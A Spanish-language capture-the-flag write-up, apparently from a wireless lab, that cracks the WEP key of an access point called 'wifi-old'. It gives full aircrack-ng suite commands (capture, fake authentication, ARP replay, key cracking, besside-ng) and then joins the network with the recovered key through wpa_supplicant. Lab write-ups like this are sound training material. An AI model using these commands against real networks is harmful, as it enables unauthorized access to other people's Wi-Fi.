Challenges WEP

En este capítulo vamos a realizar el siguiente reto:

  • Challenge 7 ¿Cuál es la flag en la web del AP wifi-old?


Challenge 7

  • ¿Cuál es la flag en la web del AP wifi-old?

Vemos que su puertos es el 3 y la MAC BSSID es F0:9F:C2:71:22:11

Ahora con airodump-ng hacemos un escaneo especifico

airodump-ng wlan0 --manufacturer --band bag -c3 --bssid F0:9F:C2:71:22:11 -w wifi-old

Con esto podemos ver que esa red solo tiene un usuario dentro.

Attacks

Autentificación False

Ahora desde otra terminal mientras corre airodump-ng, realizamos una autentificación falsa con aireplay-ng -->

aireplay-ng -1 3600 -q 10 -a F0:9F:C2:71:22:11 wlan0

Con esto dede el propio airodump-ng vemos a nuestra interfaz haciendo la falsa conexion con la wifi -->

Ahora desde otra terminal, hacemos el atque de envio ARP con aireplay-ng -->

aireplay-ng --arpreplay -b F0:9F:C2:71:22:11 -h 02:00:00:00:00:00 wlan0

Por ultimo, desde otra terminal, lanzamos aircrack-ng especificando el BSSID y el archivo .cap de trafico que esta capturando airodump-ng -->

aircrack-ng wifi-old-01.cap -b F0:9F:C2:71:22:11

Besside-ng

Esta es una herramienta automatica y solo hace falta especificar el canal y el BSSID -->

besside-ng -c 3 -b F0:9F:C2:71:22:11 wlan0

11:bb:33:cd:55


Wpa-supplicant Conecction

## Creamos el fichero de wpa_supplicant
nano wep.conf
## Configuracion
network={
        ssid="wifi-old"
        key_mgmt=NONE
        wep_key0=11bb33cd55
        wep_tx_keyidx=0
}
## Conexion wpa_supplicant
wpa_supplicant -i wlan0 -c wep.conf
## Pedimos IP DHCP
dhclient -v wlan0

Ahora acceder al la puerta de enlace 192.168.1.1 -->

Last updated